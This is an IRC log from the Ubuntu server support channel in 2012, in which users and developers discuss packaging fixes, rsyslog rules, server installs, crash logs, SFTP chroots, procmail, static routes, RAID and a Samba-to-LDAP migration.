<adam_g> ScottK: considering the package is entirely unusable at this point, i dunno? in addition to the fixes i'm working on, i thought maybe it'd be a good idea to provide a default that at least provides a running service after installation
<ScottK> In that case, I guess not.  Didn't realize it was that broken.
<Daviey> adam_g: oh, most certainly
<Daviey> OVS should always be the default plugin
<Daviey> it can be used everywhere.
<zul> adam_g: it should be in a better state in the ci testing
<adam_g> zul: no, its broken
<zul> adam_g: and im ok with ovs as the default
<zul> adam_g: borken as in how?
<adam_g> zul: what ive fixed so far: http://paste.ubuntu.com/1191538/
<zul> adam_g: cool just wondering
<zul> adam_g: im going to be uploading rest of the snapshots tonight
<adam_g> zul: okay, ill hopefully have this working better out of the box by then
<zul> adam_g: coolio
<adam_g> Daviey: https://code.launchpad.net/~gandelman-a/ubuntu/quantal/openvswitch/lp1044318/+merge/123350
<Daviey> adam_g: perfect upload
<Daviey> adam_g: do you need sponsoring ?
<adam_g> Daviey: i believe i do
<adam_g> zul: is quantum-plugin-dhcp-agent supposed to have a corresponding quantum-plugin-dhcp package? i see a .insatll for it, but its not in d/control
<zul> adam_g:  its suppose to
<TheLordOfTime> anyone noticed an issue with umount, and unmounting kerberos/nfs shares?
<TheLordOfTime> i've got an issue where umount doesn't recognize that a folder contains a mounted share, so i can't shut down completely because it can't unmount...
#ubuntu-server 2012-09-08
<halvors> Ubuntu 12.10 have the "miniupnpd" deamon avaliable in the universe repository, but i can't get it work with iptables, it seems like it doesn't integerate correctly with iptables.
<qcjn> hi, i have a "homework" making a service start up script. But in college we use fedora 15. Since at home i'm using Ubuntu, i thought of making it on ubuntu. But it seems that there is a lot of difference. from syslog to rsyslog. no chkconfig on ubuntu. functions are not at  /etc/rc.d/init.d/functions. and are the functions the same ? And maybe there's other thing i haven't seen. ???
<arrrghhh> qcjn, well for one ubuntu moved to upstart recently
<arrrghhh> that's a pretty big difference
<arrrghhh> syslog and rsyslog - i don't see what that has to do with startup scripts...
<arrrghhh> i'm not so familiar with fedora tho
<patdk-lap> recently?
<patdk-lap> almost 4 years ago
<qcjn> arrrghhh, syslog rsyslog is because we have to make a script that if some acces or modify a file then it is log in /var/log/my_file_service.log
<arrrghhh> patdk-lap, sorry i just moved off of 10.04...
<patdk-lap> upstart came in with 9.10
<arrrghhh> yes.  which is right before 10.04
<patdk-lap> yep
<arrrghhh> i just remember the transition being recent... i'm old :P
<patdk-lap> heh, I do the alpha and beta testing
<patdk-lap> so that added an extra 6months to me almost
<patdk-lap> seens like forever ago, in testing :)
<arrrghhh> nice.  on quantal already?
<patdk-lap> been doing testing on it ya
<arrrghhh> nice
<arrrghhh> i just went to precise
<arrrghhh> it finally went .1 ;)
<patdk-lap> I just started upgrading my stuff from lucid to precise
<patdk-lap> have my package repo all up now with the fixes and other things I need
<patdk-lap> and done all the testing I needed
<arrrghhh> yea i had a few hiccups.  mostly config file changes i needed to make.
<arrrghhh> dnsmasq really threw me for a loop
<patdk-lap> I didn't even modify my dnsmasq
<patdk-lap> oh wait, I'm not using dnsmasq :)
<arrrghhh> haha
<arrrghhh> i guess i'm a masochist
<arrrghhh> let's have it all in one... oh no it's all broken
<qcjn> ok, i think i understand the principle of the chkconfig command. What it does when you put the add option it checks in the service script, with grep maybe, what are the option that you have put on the chkconfig line
<patdk-lap> I have like 100 vm's
<arrrghhh> dang
<qcjn> no /var/lock/subsys/   either
<qcjn> must be /run/lock
<arrrghhh> qcjn, every linux distro will be slightly different
<qcjn> ok
<arrrghhh> about the only thing similar is the kernel ;)
<qcjn> arrrghhh, would you know how i can make so that it logs in /var/log/myservice.log   in fedora 15 we just had to add this line      user.*   /var/log/myservice.log     in the syslog.conf and restart syslogd
<arrrghhh> qcjn, it's similar.  change /etc/rsyslog.conf
<arrrghhh> er, that might be in /etc/rsyslog.d/50-default.conf actually
<qcjn> i tried putting it in 50_default but it doesn't work
<qcjn> neither in rsyslog.conf
<qcjn> it s always sent to /var/log/syslog
<arrrghhh> qcjn, well look at the lines
<arrrghhh> they are processed in order
<arrrghhh> the *.* -/var/log/syslog sends everything to /var/log/syslog
<arrrghhh> there's a user.* that's commented out pointing to /var/log/user.log
<patdk-lap> well lines go to all rules
<patdk-lap> unless it hits a stop rule
<arrrghhh> oh yea, you could send the same information to multiple places
<arrrghhh> simultaneously
<arrrghhh> qcjn, so uncomment that line and change it to /var/log/myservice.log
<qcjn> arrrghhh, yes i've seen the user.log , but i want my own
<arrrghhh> i don't understand
<qcjn> i'll try it. but i ve put aline similar as the user.log under the commented one, and it didn't work. Always just the syslog
<arrrghhh> change the /var/log/user.log to /var/log/myservice.log
<qcjn> patdk-lap, must i put a "stop rule "
<qcjn> cause we can test with logger command
<patdk-lap> if you want to not log it, yes
<qcjn> patdk-lap, no thats not what i want. I want it to be log in myservice.log
<patdk-lap> heh?
<arrrghhh> qcjn, don't put any stop rules..
<patdk-lap> you said you didn't want it in syslog
<patdk-lap> so  you put a rule that says, log to myservice
<arrrghhh> yes
<patdk-lap> then you put a rule that says, don't follow any more rules
<qcjn> i don't want the other services not to be able to log in syslog. i just want myservice to be log in myservice.log
<arrrghhh> qcjn, then add the line i mentioned?
<arrrghhh> so you want everything to go to /var/log/syslog and /var/log/myservice.log?
<arrrghhh> add a line '*.*      -/var/log/myservice.log'
<qcjn> logger -p user.info "file has been modified" <== this is the line in the sript
<arrrghhh> what is this, i don't even...
<patdk-lap> that line will log it, and log it with sync active
<paradizelost> i'm setting up lvm for the first time and looking to do a snapshot rotation, but i'm not sure on how to size my snapshot volume, any recommendations?
<patdk-lap> but it won't stop it
<patdk-lap> the simple way
<qcjn> it wont stop it to log to syslog. Right. but that doesn't matter. As long has it s logged in myservice.log
<patdk-lap> 10-myservice.conf
<qcjn> ok
<patdk-lap> user.*  /var/log/myservice.log
<patdk-lap> user.*  ~
<patdk-lap> done :)
<qcjn> user.*  ~   <== but will this line stop other services from writing to syslog ?
<patdk-lap> it will stop anything that matchs
<qcjn> ah, ok. now i see
<qcjn> Thanks. I'll try this
<patdk-lap> I use that often, to not log annoying stuff I don't care about
<qcjn> ok
<arrrghhh> patdk-lap, so can you explain why the second line is necessary?
<arrrghhh> it seems like the first line would be sufficient
<patdk-lap> arrrghhh, I have to say it again? it logs to ALL matching lines
<arrrghhh> that... i guess just doesn't make sense.
<patdk-lap> nothing about the first one says, don't continue
<arrrghhh> but i'm not in the right state of mind for this
<patdk-lap> the - only means, don't write buffer
<patdk-lap> if you use - on all logs, your going kill performance
<patdk-lap> so use it when needed
<arrrghhh> it's on 'em by default
<qcjn> it s like saying "write to that file only" if there is another rule, don't follow it. Right
<patdk-lap> ya, and by default it's for safety
<paradizelost> anyone who can help with lvm snapshotting around?
<patdk-lap> sync logs can be nice and all, but generally I don't see the point of sync writes for syslog/messages, for auth, sure
<patdk-lap> maillog, for me atleast, defently not, too much logging for it to be sync
<qcjn> for now i don't really understand what all does category's of log means. Sean them for the first time yesterday
<qcjn> s/all does/all those
<qcjn> seen
<qcjn> daemon /root/bin/suivi_fic_lsof.sh   <=== this is a line in my service, and i get this error ==> ligne 20: daemon : commande introuvable
<qcjn> . /lib/lsb/init-functions  <== this is in the service script to
<qcjn> earlier i did a "grep daemon /lib/lsb/init-functions" and some line came out. But i'm to much of a novice to tell if the functions we're ok !
<Kentos> hello there
<qcjn> By the way, the rsyslog, works, i tested it with logger
<qcjn> hi, Kentos
<Kentos> still giving my dell 2800 the old college try, hoping to get it running
<Kentos> can't seem to find a way to boot into an install cd or usb
<arrrghhh> Kentos, even the alternate CD?
<Kentos> yeah, i got into the alternate CD i believe but i had no idea what was going on with that, looked like a desktop install or something
<arrrghhh> well make sure you download the right disc
<Kentos> DLing the 32bit yeah
<arrrghhh> server or desktop
<Kentos> about 20 times no so far lol
<Kentos> lol i didnt buy a server to run ubuntu desktop on it =P
<arrrghhh> er
<arrrghhh> i guess alternate is for desktop only
<Kentos> but indeed i have DLed the server ones a lot, the alternate cd doesnt look really like either but some different installer entirely
<arrrghhh> sorry, i forgot about that
<arrrghhh> the alternate and server installs should be the same from the installer perspective
<arrrghhh> just what is installed is different obviously
<Kentos> gave me different boot interfaces, only 4 options on the alt installer and the server one wouldnt install properly, didnt detect my nic or a lot of my hardware
<arrrghhh> what do you mean didn't detect your nic
<Kentos> might have to try an older version of the ubuntu server
<arrrghhh> is this really old hardware or something?
<arrrghhh> did you test the hardware first?  is it good?
<Kentos> said my network adaptor wasnt detected, asked me where to get the driver from, but, i reloaded the old OS on it(which was the previous owners) and the card is working fine
<arrrghhh> that doesn't sound like ubuntu server.
<Kentos> huh?
<arrrghhh> "said my network adaptor wasnt detected, asked me where to get the driver from"
<arrrghhh> that doesn't sound like anything ubuntu server would do ^^
<arrrghhh> asked you where to get the driver from?  that sounds very windows-ish
<Kentos> yeah gave me an option, 'not installed' 'hdlc' and "use driver on meida' or something similar
<Kentos> yeah, i suppose it does
<arrrghhh> this was during the installation?
<Kentos> but windows doesnt have a purple background and a text installer lol
<arrrghhh> .....
<arrrghhh> regardless, is this really old hardware?
<Kentos> this was while trying to install from a usb which was odd, i didnt think it could do that. The odd part is it didnt ask me which of the 7 drives to isntall it on
<Kentos> yeah, its a dell poweredge 2800
<arrrghhh> you can install from usb
<Kentos> well, some consumer products dont support it that are as old as this server, but it has a usb emulation option, hardware auto and floppy selectionds
<Kentos> harddrive**
<arrrghhh> well i really don't know
<Kentos> its an interesting interface, Im not familiar with actual server hardware, let alone a server bios and raid card 'bios' etc.
<arrrghhh> it sounds like you've tried so much you don't know what you've tried anymore.
<Kentos> no
<Kentos> i've tried using many diferent DLs of the iso, but with the real hash check page (not the main support page one that gives false hash values) it looks like it should boot with what i have, however it wont seem to boot from the CD drive, and the checksum on the usb (when done before trying to install) produces errors
<arrrghhh> well that's not good
<arrrghhh> what are you talking about false values
<arrrghhh> oy... the md5sum should be right on the iso
<Kentos> the md5sum values listed on the main ubuntu howtomd5sum check(or whatever the link is) points to a page that states many different hash values, i've never found one that matched so far. However when i google the hash value checks i found a seperate site that listed the hash values of what i saw on my checks
<arrrghhh> lol
<arrrghhh> this sounds dubious at best
<Kentos> which just shows the numbers in a browser listed, no special website design or anything
<Kentos> well, its all i can find on the hash values that works, and downloading the files never work no matter if i use mirrors or torrents
<arrrghhh> do the downloads not complete or something?
<Kentos> it always produces the hash value that is not directly shown on the ubuntu support pages
<Kentos> they always complete
<arrrghhh> there isn't an md5sum on the iso itself?
<Kentos> the iso is just an iso file, i could take a look again but thats pages and pages of numbers
<arrrghhh> look inside the iso
<arrrghhh> it's just like a zip file
<Kentos> i used winmd5sum for the hash check
<arrrghhh> no
<Kentos> idk about that
<arrrghhh> well, that's one place to hashcheck i guess
<arrrghhh> that would check if the download is good
<arrrghhh> i guess you're not getting a boot menu so you can't integrity check, nvm
<Kentos> thats what im saying, i do the hash check and no matter where i get the download its always the same hash value
<Kentos> but it doesnt match the value on ubuntus main support site, let me try and find it again
<mysteriousdarren> Kentos: did you try to install any?
<arrrghhh> it should be on the iso
<Kentos> https://help.ubuntu.com/community/UbuntuHashes
<Kentos> that one always shows me an incorrect match
<arrrghhh> so you burn the iso
<arrrghhh> you go to install
<arrrghhh> and the installer fails?
<Kentos> however i never get a different hash value from a check on any DL of the ISO, meaning every iso always shows the same hash value when checked, but of course it doesnt match as i stated before
<arrrghhh> as i said
<arrrghhh> the MD5 is on the ISO
<arrrghhh> md5sum.txt
<arrrghhh> at the root of the iso
<Kentos> no, cant even get it to boot on the cd, i used a usb through the universalusbinstaller, since i can't even get it to show up with a cd
<arrrghhh> although i guess that's just md5's of the individual files
<arrrghhh> derp, i thought it had the md5 of the iso
<arrrghhh> Kentos, that sounds like a hardware/bios issue
<arrrghhh> if you can't get it to boot from cd
<Kentos> no worries, it is an old server, im not sure it will work with the newer 12.04 release
<arrrghhh> it should
<arrrghhh> if it's not even booting from the cd... lol
<Kentos> im currently cleaning some scsi drives in hopes that ill get a step further lol no idea how that would help but i'm trying whatever I can
<arrrghhh> ....
<arrrghhh> you should try booting without anything plugged in, just to see if you can get the thing to boot
<arrrghhh> well, plug in the optical drive
<arrrghhh> but if you can't even boot like that, your BIOS is not configured correctly
<Kentos> yeah, ill check it out in a minute here, i was thinking of pulling the HD trays out and see what happens
<arrrghhh> so you've checked the BIOS settings?
<arrrghhh> sometimes boot from cd is disabled for security reasons
<arrrghhh> or so people can't accidently screw things up :P
<Kentos> yeah i might have, but i didnt see an option to enable or disable boot from cd
<arrrghhh> might be the issue
<arrrghhh> if it's disabled, it might not show up in the boot order
<arrrghhh> so you'll have to enable it
<Kentos> just boot sequence, and boot disk priority
<Kentos> no, the ATA drive(the cdrom) should be enabled
<arrrghhh> hey you said you can't boot from it
<Kentos> oddly theres a virtual floppy and virtualcdrom drive on here,. no idea what thats about
<arrrghhh> DRAC
<arrrghhh> there's probably a DRAC card
<Kentos> yeah, but i got a usb stick as well lol
<Kentos> yeah there is
<arrrghhh> that's what the virtual stuff is for
<Kentos> maybe i should disable the RAID drives? not sure what to do lol
<arrrghhh> disable everything
<arrrghhh> disconnect everything
<arrrghhh> strip it down to the bare essentials
<arrrghhh> make sure you can boot from some cd
<arrrghhh> that you know works in other machines for example
<Kentos> ill check it on this machine quick and make sure
<qcjn> Gnite, andthanks
<Kentos> alrighty
<Kentos> seems as though its telling me to reconnect all the drives and reboot the system, im going to let it go forward and try to boot though, the CD was indeed a good cd
<protoCall7> Hey oApocalypse:  did you ever get your minidlna project figured out?
<mysteriousdarren> Kentos: what happened?
<Sachin__> whats the solution for thread level file locking?
<kisom> Hey guys. I need a pointer to how I should get my ubunty 12.04 machine to connect to a WPA network using mschapv2
<kisom> Google haven't turned out anything useful so far
<Kentos> Hey everyone
<Danawar> hey ubuntu server my server went down this morning at 7:20 and i have no idea why all my hosted services like teamspeak minecraft etc went offline
<Danawar> after reading the syslogs the last entry nearest the time was -
<Danawar> Sep  8 07:09:01 Grantleyserver CRON[11129]: (root) CMD (  [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete)
<Danawar> Sep  8 07:17:01 Grantleyserver CRON[11748]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
<Danawar> is there any where else is should be looking for information on why the server went down?
<SpamapS> Danawar: perhaps look at what /etc/cron.hourly runs
<Danawar> Looking into that directory there is nothing just .placeholder
<Danawar> Could the server have over heated or somthing? where would that be presented in logs?
<Danawar> The server was on no vga output and no services like ssh were working
<qman__> sounds like a hardware crash, if there is any log, it could be in /var/crash
<qman__> but that only occurs if you have it set up to, and even then only under certain types of crashes
<qman__> you can also check /var/log/kern.log for panics
<Danawar> I will check both now thanks for your help!
<qman__> one other thing, if you have a kernel panic, the keyboard num lock / caps lock / scroll lock lights will flash in various patterns
<Danawar> Only pidgeon and compiz crashes
<qman__> if you're running compiz, you're running a desktop
<qman__> there's a reason server doesn't include those things, they're not stable, and a graphics crash can halt a system
<Danawar> True
<Danawar> I took the risk because i am a novice and trying to learn server administration and security
<Danawar> last item in kern log was ufw  at 4:00 in the morning im gussing it was probably a graphics crash
<qman__> just FYI, the correct way is to install the absolute minimum software needed on the server, and administer it from your desktop with SSH
<qman__> there aren't any GUI tools to administer it anyway
<qman__> it eliminates unnecessary security risks and potential things to crash
<Troy^> trying to think of some other neat things to run on my server right now it is just pretty much a sickbeard, couchpotato, usenet downloader/processor
<Troy^> please help, i'm trying to make specific users only able to access their home directory, i edited the config file but on login of that user it gets Response:	500 OOPS: vsftpd: refusing to run with writable root inside chroot()
<qman__> Troy^, the right solution is to not use FTP
<qman__> SFTP has this feature built in, it only needs to be enabled
<Troy^> SFTP is accessable by a ftp client correct?
<qman__> only if it supports it
<qman__> but filezilla and winSCP both support it
<qman__> there are dozens of other reasons to never use FTP for anything, ever
<qman__> http://mywiki.wooledge.org/FtpMustDie if you want to learn them
<qman__> http://www.debian-administration.org/articles/590 for an explanation of how to set up sftp for chroots
<qman__> it's for debian but ubuntu is close enough
<Troy^> ok thanks i'll try it out
<Troy^> so what is suppose to replace ftp
<StevenR> sftp
<StevenR> you can use rssh if you only want sftp users to have sftp/scp access
<qman__> or you can use the sftponly directive in the config
<qman__> as in that example
<Troy^> seems like something keeps eating my server ram
<Troy^> when i first boot it uses like 11-19% memory
<Troy^> 3 days later i'm at 45%
<qman__> what are you using to measure it
<qman__> rather, do free -m
<qman__> ignore the first set of numbers, and instead only pay attention to the free memory +/- buffers/cache
<qman__> linux (rightly) uses all free memory as disk cache whenever possible
<riz0n> hello, I have a new Ubuntu 12.04.1 server installation. I have configured postfix, dovecot, spamasssassin, amavis, and SA is actually flagging spam as it should. I am using the Maildir/ format for email. I want to enable procmail so that the server will automatically move all messages marked as ***SPAM*** to junk e-mail folder. I created a /etc/procmailrc file, which defines DEFAULT and
<riz0n> MAILDIR  as "$HOME/Maildir/" and uncommented the mailbox_command=procmail -a "$EXTENSION" ... however when I do this, spam messages no longer get marked, and it is not moving the messages to its respective location. I need this filter to be system-wide. What do I need to do to get this to function properly?
<Troy^> oh ok qman__ that makes sense
<Troy^> 1346m free
<riz0n> Also,if you guys would like to see my config files, where would be a good place to pastebin?
<Troy^> riz0n: cat cfg.conf | pastebinit
<Troy^> where cfg.conf is interchangeable etc.
<riz0n> Troy^: http://ubuntuforums.org/showthread.php?p=12226654
<Troy^> riz0n: i'll look at it but possibly may not beable to help. i have very little knowledge in running a mail server
<Troy^> * ^Subject.*\*\*SPAM\*\*
<Troy^> your missing another "*"
<Troy^> ?
<guntbert> after installing ubuntu server on a dell machine (no idea if that is important) the grub menu won't show even with <shift> pressed - any ideas how to get the grub menu (without commenting out the "GRUB_HIDDEN" lines in /etc/default/grub) ?
<Troy^> riz0n: this line * ^Subject.*\*\*SPAM\*\* does not look right to me if your mail is going to have the spam be renamed to ***SPAM*** in front
<qman__> guntbert, most likely, your keyboard isn't working in the short amount of time that grub listens for keystrokes
<qman__> I'd suggest turning off hidden and using a longer timeout (like 5 seconds)
<qman__> at least to troubleshoot it
<qman__> you can then turn hidden back on if you confirm it
<guntbert> qman__: ah, you might be on to the cause - with hidden switched off and timeout=5 I was not able to select anything - so remains the question: what could I do to keep the keyboard activated?
<qman__> the culprit is probably the USB keyboard settings in the BIOS
<qman__> problem is, a dell or any other OEM board probably won't let you change them
<qman__> if your system is old enough to have a PS/2 port and you have a PS/2 keyboard, give it a try
<guntbert> qman__: entirely possible - thanks for the input - strange thing is that the keyboard works immediately after the system start (F12 for boot menu for instance)
<qman__> also, if you're using a wireless keyboard or something equally high-level, try a normal one
<qman__> there's a reason USB keyboards took so long to catch on as standard
<qman__> the support has always been weird like that
<qman__> what is probably happening: Dell BIOS sees USB keyboard and knows how to use it, but is set in a mode where it doesn't send legacy keystrokes to the OS
<guntbert> no, they are rather new systems - only usb - but it is only a real problem when I mess up the password hash in the preseed file :)
<qman__> after grub loads linux, linux knows what to do with it
<guntbert> qman__: your explanation is very convincing, thanks
<riz0n> Troy^: Thanks. Here is the issue. When I have the mailbox_command line #'d out, I get messages in the INBOX with ***SPAM*** however when the line is uncommented, spam messages do not have ***SPAM*** prefixed to the subject. I did add the extra \* to the procmailrc file
<Troy^> hmm riz0n i don't really know what to say
<riz0n> Troy^: Thanks. I think one problem was, possibily, was I had the the mailbox_command line before the content_filter. I changed those two lines around.
<Troy^> riz0n: works now?
<riz0n> Also in the procmailrc file, should I have :0 or :0: ??
<riz0n> Troy^: Not sure, I will have to wait for someone to spam me :P
<Troy^> riz0n: ahh lol
<riz0n> OK I will wait a few hours and see what happens. if I don't get the results I am aiming to achieve, I will come back and seek more advice.
<learnorchestra> guys, a newbie question, is MAAS and Orchestra the same thing?
#ubuntu-server 2012-09-09
<capitaninsaneoh> Is it possible to use and encrypted home directory with apache?
<patdk-lap> sure if your logged in
<capitaninsaneoh> what if I have a web app I have to sudo to root for?
<capitaninsaneoh> and use tmux
<capitaninsaneoh> wouldn't Tmux keep me logged in?
<capitaninsaneoh> Doesn't tmux allow me to do that?
<capitaninsaneoh> Or am I confused?
<kennett> I'm trying to install Ubuntu Server using a USB drive but it says it can't mount CD image.
<mysteriousdarren> kennett: details?
<theguywithanaxe> Hello everyone
<mysteriousdarren> Kentos: figuring things out?
<theguywithanaxe> yeah, i pulled the drives out, cleared the OS HDDs and got through the install
<theguywithanaxe> now im wondering if i can (after setting up a mirror raid for the OS drive) create post install another raid with my remaining 4 drives
<theguywithanaxe> not sure how that would exactly work, but i want to use them for data storage
<theguywithanaxe> i know the 4 drives i want to make a new raid for are on a seperate card, should be an md0 and a md1 if load in the drives again correct? or is the mdadm arrays only shown if configured already in a raid set-up?
<theguywithanaxe> through the instalation that is
<theguywithanaxe> odd, im using my alt username lol
<Kentos> oh
<Kentos> logged in twice lol
<Kentos> did kennet figure it out?
<Gargoyle> Is there a recommended / standard place to put "route add" commands for upstart (12.04)? Is rc.local still a good place?
<lifeless> Gargoyle: generally in the ifup for the interface
<Kentos> i can check the manual quick, i thought i saw something in there about routing
<Kentos> static or dynamic routing?
<Gargoyle> static.
<Gargoyle> Node has two interfaces eth0 = iternet, eth1 = LAN. Routes are for LAN traffic
<Gargoyle> the scripts in /etc/network/if-up.d look a bit mental, I might just stick with rc.local! :)
<lifeless> Gargoyle: in interfaces, post-up ip route add foo via ar
<lifeless> Gargoyle: don't need a separate script
<Kentos> hmm, i don't see much info on the configuration of the IP routing. It does have some info on the ethtool program
<Kentos> and how to route to a gatewal, and a little on Kernal IP routing tables
<Kentos> gateway**
<Kentos> are you using a seperate router for the lan?
<Gargoyle> Kentos: Yes. The servers need to know the route to the other nets is via a second firewall / vpn endpoint. Not the default gw.
<Gargoyle> thanks lifeless
<lifeless> Gargoyle: man interfaces FWIW
<lifeless> Gargoyle: you can do a script in network/if-up.d if you want
<Gargoyle> lifeless: I keep forgetting that most config files have a man page!
<lifeless> Gargoyle: just need to check for $IFACE at the top of each script.
<Kentos> yeah, i found a nother way to do it, not sure if its as viable, but if its working via lifeless suggestion sounds like your set to go
<Kentos> hmmm, reading up on networking =P interesting to note though it almost sounds like your bridging two network segments and then filtering from one to the other with a firewall
<Kentos> almost sounds like something i would want to do for security reasons
<Kentos> @Gargoyle of course
<Gargoyle> Kentos: Yes. the firewalls are establishing IPSec VPN connections
<Gargoyle> so from home I can just connect to 192.168.100.105, for example.
<Gargoyle> On the internet side, everything is blocked except http and IPSec.
<Kentos> I was also wondering, I have two hdd controllers, and I believe they both can be set up for a raid with 4 drives each, I unplugged the bottom array while figuring out how to get the installer to run properly, I then set up a mirror (RAID1) on two drives
<Kentos> I was wondering, since ive already installed the OS, could i still go back now, with the 4 otehr drives plugged into the bottom controller and set up a raid for data storage?
<Gargoyle> Kentos: Don't see why not. You can just mount it somewhere on the filesystem
<Kentos> mount through mdadm?
<Kentos> im just wondering how I go about this, I havent foudn any documentation on it
<Gargoyle> err. Been a while since I did it, but IIRC, mdadm is used to create the RAID. then you would use normal mount. eg mount /dev/mdc1 /mnt/secondary_raid_storage
<Kentos> alright, so i just have to create the RAID and then mount as a filesystem. Ill check out what i got on info and plow through it tonight
<Gargoyle> Kentos: You create the RAID, and then you'll have a new block device like /dev/md??
<Gargoyle> then you use that like you would any other disk. Create your filesystem, mount it, etc.
<Kentos> yeah im pretty sure thats how it will go, md0 is already configured etc. so md1 would be the next raid array if set up i believe, basically acting as the software raid controller
<Kentos> anyone familiar with website based data storage, like setting up upload/download options?
<Kentos> im not sure if i have to use an FTP type set up, I'd rather have it handled over a webpage in the future
<Gargoyle> Kentos: You mean just uploading via a page in the website (using PHP or something) ?
<Kentos> yeah, i wasnt sure if it was a php thing or not, ussually looks like standard html buttons on websites, but if i can go with php. Learning to set something basic up to start
<Gargoyle> Kentos: Or do you mean for updating your actual website html files?
<Kentos> no no, I can update files well enough with webmin
<Kentos> looking to have someone able to register and activate an account, and then proceed to log in and have an upload/download option
<Kentos> with some sort of designated disk space
<liam> Hi, what do you usually install on a ubuntu server? apache/nginx, mysql/postgres, chef, git, htop, memcached, newrelic, ntp, openssl, php/ruby/rvm/python, postfix/exim, god/monit/bluepill, nagios, haproxy, imagemagick, unicorn/mongrel/passenger....what am I forgetting? :-)
<Kentos> what are you trying to do with it?
<Kentos> im not all that knowledgable, don't recognize some of those packages
<liam> Kentos: I need to configure 2 machines (with failover) for a rails application
<Kentos> thats bigger then what i've done/am doing
<liam> :)
<Kentos> trying to set up an old tower server currently, rail application i have no experience with
<liam> for rails sw i'm pretty confident, I'm not sure what extra software should I use, for example fail2ban, rkhunter, and others I probably don't know
<uvirtbot> New bug: #1017258 in mysql-5.5 (main) "package mysql-server-5.5 5.5.24-0ubuntu0.12.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,Invalid] https://launchpad.net/bugs/1017258
<uvirtbot> New bug: #1048119 in samba (main) "Nautilus stores Samba config in gconf instead of smb.conf" [Undecided,New] https://launchpad.net/bugs/1048119
<uvirtbot> New bug: #1048172 in maas (main) "dpkg: error processing maas-dhcp (--configure):" [Undecided,Confirmed] https://launchpad.net/bugs/1048172
<uvirtbot> New bug: #1048008 in tgt (main) "tgt needs restart to find LUN" [Undecided,New] https://launchpad.net/bugs/1048008
<uvirtbot> New bug: #1048075 in lm-sensors (main) "Error updating RRD file (extra data on update argument)" [Undecided,New] https://launchpad.net/bugs/1048075
<uvirtbot> New bug: #1048093 in asterisk (universe) "Outstanding security fixes in asterisk" [Undecided,New] https://launchpad.net/bugs/1048093
<uvirtbot> New bug: #988999 in quantum (universe) "quantum-common error configuring (no /etc/quantum)" [Medium,Fix released] https://launchpad.net/bugs/988999
<uvirtbot> New bug: #1029889 in qemu-kvm (main) "LVM Based KVM VM taking 100% CPU on first start and hangs." [High,New] https://launchpad.net/bugs/1029889
<uvirtbot> New bug: #1047262 in samba (main) "race condition on startup between samba and cups" [High,Fix released] https://launchpad.net/bugs/1047262
<uvirtbot> New bug: #1047105 in mysql-5.5 (main) "btree index not working for strings that start with the % char" [Undecided,Invalid] https://launchpad.net/bugs/1047105
<uvirtbot> New bug: #1047531 in qemu-kvm (main) "Ubuntu 12.04 (Precise) guests can't boot on Ubuntu 10.04 (Lucid) QEMU-KVM host" [Undecided,New] https://launchpad.net/bugs/1047531
<uvirtbot> New bug: #820688 in glance (main) "glance-api and glance-registry will not be started on transition from runlevel 1 to 2" [Low,Fix released] https://launchpad.net/bugs/820688
<uvirtbot> New bug: #1044447 in unity-lens-photos (main) "[FFe] [MIR] unity-lens-photos in quantal" [Undecided,Fix committed] https://launchpad.net/bugs/1044447
<uvirtbot> New bug: #1047520 in php5 (main) "NEWS and release notes need updating" [Critical,In progress] https://launchpad.net/bugs/1047520
<uvirtbot> New bug: #957622 in qemu-kvm "kvm -kernel with grub multiboot kernel dumps core or exits" [Medium,Fix released] https://launchpad.net/bugs/957622
<uvirtbot> New bug: #1047249 in python-quantumclient "python-quantumclient is deprecated into Folsom testing PPA" [Undecided,New] https://launchpad.net/bugs/1047249
<uvirtbot> New bug: #947597 in qemu-kvm (main) "qemu sometimes hangs on shutdown in GRUB tests" [High,Expired] https://launchpad.net/bugs/947597
<uvirtbot> New bug: #948675 in qemu "QEMU is crashing when called with "-vga none"" [High,Fix released] https://launchpad.net/bugs/948675
<manu91> hello
<manu91> !list
<ubottu> manu91: No warez here! This is not a file sharing channel (or network); read the channel topic. If you're looking for information about me, type Â« /msg ubottu !bot Â». If you're looking for a channel, see Â« /msg ubottu !alis Â».
<uvirtbot> New bug: #1048248 in checksecurity (main) "check-setuid does not check all filesystems" [Undecided,New] https://launchpad.net/bugs/1048248
<decci> Any idea about migrate from internal samba authentication to LDAP authentication keeping the same functionalities.
<decci> Currently there is a working Samba domain controller. On this server we have the samba domain controller as well as a file server with different shares for each user including profiles. The PCs are connecting with Windows Roaming Profiles. The two servers are up and running
<Psi-Jack> decci: Migrate?
<Psi-Jack> As in, keeping current database that's in use now, and migrate that into your LDAP store?
<decci> Psi-Jack: Let me explain : Currently there is a working Samba domain controller. On this server we have the samba domain controller as well as a file server with different shares for each user including profiles. The PCs are connecting with Windows Roaming Profiles. The two servers are up and running.
<decci> Psi-Jack: Integrate the existing, working (and in use!) Samba domain controller and file server with a new LDAP server. To summarize, the aim is to migrate from internal samba authentication to LDAP authentication keeping the same functionalities.
<Psi-Jack> Okay, so yeah, you want to convert tdbsam to ldapsam.
<Psi-Jack> Have you already imported all your user accounts into LDAP and just needing the Samba information?
<decci> Psi-Jack: No..I need to do that too..
<decci> Psi-Jack: Where shall I start...I did long time importing NIS users to OpenLDAP and 389 DS
<Psi-Jack> you need to do that first, then you can do the pdbedit -i tdbsam -e ldapsam migration. :)
<decci> Psi-Jack: But new to this case
<decci> Psi-Jack: I am aware of PADL Migration tools though
<decci> PADL migration tools is used to migrate the  POSIX accounts to LDAP but what about Samba to LDAP?
<Psi-Jack> pdbedit, as I said.
<decci> Psi-Jack: This is my smb.conf http://pastebin.com/uZkZwt1R
<decci> Psi-Jack: Okie...so pdbedit will migrate my samba users to LDAP, then?
<decci> Psi-Jack: What further configuration do I need and how much complicated it looks for setting up whole authentication through LDAP
<decci> Psi-Jack: There are lots of windows related share and configuration as seen in http://pastebin.com/uZkZwt1R
<decci> Psi-Jack:  we have the samba domain controller as well as a file server with different shares for each user including profiles. The PCs are connecting with Windows Roaming Profiles.
<decci> Psi-Jack: Will it be a complicated?
<Psi-Jack> decci: The only thing you're changing is where the samba user account information is stored, nothing else.
<decci> Psi-Jack: Okie
<Psi-Jack> And to configure samba to use ldap instead of tdb
